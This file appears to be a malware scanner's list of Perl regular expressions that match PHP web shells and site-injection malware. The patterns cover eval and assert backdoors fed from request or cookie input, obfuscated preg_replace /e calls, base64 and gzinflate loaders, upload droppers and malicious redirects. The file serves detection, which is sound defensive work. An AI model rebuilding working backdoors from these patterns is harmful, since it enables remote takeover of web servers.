qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\"\.\"\_rep\"\.\"lace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?error\_reporting\(0\)\;.+?\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?if\s+\(preg\_match\(\'\/googlebot\|slurp.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$([A-z0-9]{1,10})\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+if\(\$\_GET\[\".+?\(\$\_FILES\[\"uploadedfile\"\].+?<\/form>/is,
qr/<\?php\s+\$\{.+?\=\@unserialize\(decode\(get\_param.+?\]\}\;\}\s+\?>/is,
qr/<\?php.+?define\(\'\_JEXEC\'\,\s+\'([A-z0-9]{100,}).+?<\/form>\'\;\s+\?>/is,
qr/<\?php\s+\/\*\s+DO.+?class\s+ADODB\_Pager.+?\$pager\->render\_pagelinks\(\)\;/is,
qr/\#\!\/usr\/bin\/env\s+php\s+<\?php.+?private\s+function\s+extractFile\(\$info\).+?\_\_HALT\_COMPILER\(\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+if\s+\(isset\(\$\_GET\[\"ping\"\]\)\s+and\s+\$\_GET\[\"ping\"\]\s+\=\=\s+\(\"ping\_host\"\)\)\s+\{.+?\}\s+else\s+\{\s+echo\s+\"false\"\;\s+\}\s+\}\s+\?>/is,
qr/RewriteEngine\s+on\s+RewriteCond\s+\%\{HTTP\_USER\_AGENT\}\s+android\s+\[NC\,OR\].+?RewriteRule\s+\^\(\.\*\)\$\s+http\:\/\/sswim\.ru\s+\[L\,R\=302\]/is,
qr/<\?php\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?\$domain\s+\=\s+\'([A-z0-9]{1,20})\.liveupdates\.host\'\;.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$([A-z0-9]{1,10})\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/include\s+\"\\x.+?php\"\;.+?eval\(base64\_decode\(.+?\)\)\;/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\s+\{\s+\$([A-z0-9]{1,20})\=gzinflate\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\;\s+for\(\$i\=0\;\$i<strlen\(\$([A-z0-9]{1,20})\)\;\$i\+\+\)\s+\{\s+\$([A-z0-9]{1,20})\[\$i\]\s+\=\s+chr\(ord\(\$([A-z0-9]{1,20})\[\$i\]\)\-1\)\;\s+\}\s+return\s+\$([A-z0-9]{1,20})\;\s+\}eval\(([A-z0-9]{1,20})\(.+?\)\)\;\?>/is,
qr/<\?php\s+\$randStr\s+\=\s+str\_shuffle\(.+?if\(is\_dir\(\$RootDir\s+\.\s+\"\/wp\-admin\"\)\)\{.+?\}\s+unlink\(\"\.\/test\.php\"\)\;/is,
qr/<\?\s+\$GLOBALS\[.+?\]\=Array\(base64\_decode\(.+?\)\,base64\_decode\(.+?\)\,base64\_decode\(.+?\)\)\;\s+\?><\?\s+function.+?\=Array\(.+?return\s+base64\_decode\(.+?\]\)\;\}\s+\?><\?php\s+\$GLOBALS\[.+?\)\)eval\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors\'\,\s+0\)\;\@set\_time\_limit\(3600\)\;.+?if\(isset\(.+?echo\s+\'\#ok\#\'\;.+?return\s+\$dir\;\s+\}\s+\/\//is,
qr/<\?php\s+if\(\s+isset\(\$\_REQUEST\[\"test\_url\"\]\)\s+\)\{.+?if\s+\(file\_exists\(\"wp\-content\"\)\).+?unlink\(\$scriptname\)\;\s+\?>/is,
qr/<\?php\s+echo\"Hello\,\s+Dollys\"\;error\_reporting\(0\)\;if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\s+\&\&\s+md5\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\s+\=\=\s+\'([A-z0-9]{20,})\'\s+\&\&\s+isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\s+eval\(base64\_decode\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\;\?>/is,
qr/<\?php\s+\$RootDir\s+\=\s+\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\;.+?if\s+\(\!\s+is\_dir\s+\(\s+\$RootDir\.\"\/wp\-content\"\s+\)\).+?\$str\=\'<\?php\s+if\(\$\_GET\[.+?unlink\(\"\.\/([A-z0-9]{1,20})\.php\"\)\;/is,
qr/<\?php\s+if\(\$\_GET\[\".+?<\/form><\?php\s+\}\s+\?>/is,
qr/\?php\s+\/\*\s+\(c\)\s+2005.+?\=base64\_decode\(\$.+?for\(\$i\=0\;\s+\$i<strlen\(\$.+?\=\@gzinflate\(strrev\(\$.+?\)\;\s+\}\s+\?>/is,
qr/if\(isset\(\$\_REQUEST\[\'.+?\$array\_name\s+\.\=\s+\$alphabet\[\$.+?\/\/\s+MALWARE\s+\$([A-z0-9]{1,20})\(\)\;\s+exit\(\)\;\s+\}/is,
qr/\$alphabet\s+\=\s+\".+?\$string\s+\=\s+\".+?\$array\_name\s+\=\s+\"\"\;.+?\$array\_name\s+\.\=\s+\$alphabet\[\$.+?strrev\(\"noi\"\.\"tcnuf\"\.\"\_eta\"\.\"erc\"\)\;.+?\/\/\s+MALWARE\s+\$([A-z0-9]{1,20})\(\)\;/is,
qr/<\?php\s+error\_reporting\(E\_ERROR\)\;.+?\$fp\=fopen\(\$filepath\,\"w\"\)\;.+?echo\s+\"uploaded\"\;\s+\}\s+\?>/is,
qr/<\?php\s+error\_reporting\(E\_ERROR\)\;.+?\$fp\=fopen\(\$filename\,\"w\"\)\;.+?echo\s+\"publish\s+success\"\;\s+\?>/is,
qr/<\?php\s+array\_map\(\"ass.+?rt\"\,\(array\)\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\?>/is,
qr/<\?php\s+\@eval\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\?>/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;\s+charset\=utf\-8\'\)\;\s+\$.+?\=urldecode\(.+?\)\;exit\(\)\;\}\}.+?\]\(\)\;\?>/is,
qr/<\?php\s+function\s+selfURL\(.+?function\s+myshellexec\(\$cmd\).+?\$proxy\_shit\=.+?c79shexit\(\)\;\s+\?>/is,
qr/<\?\s+if\s+\(isset\(\$\_POST\[\'action\'\]\).+?if\s+\(\$action\=\=\"send\"\).+?print\s+\"\-\=ok\=\-\"\;\s+\}\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"as\"\.\"se\"\.\"rt\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_replace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"pr\"\.\"eg\"\.\"\_r\"\.\"ep\"\.\"la\"\.\"ce\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"ass\"\.\"ert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_rep\"\.\"lace\"\;\/\*([A-z0-9]{1,20})\*\/\$\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"ass\"\.\"ert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"preg\_replace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"as\"\.\"se\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"pre\"\.\"g\_r\"\.\"epl\"\.\"ace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_repl\"\.\"ace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\"\.\"\_rep\"\.\"lace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"preg\_rep\"\.\"lace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"assert\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"preg\_rep\"\.\"lace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_replace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
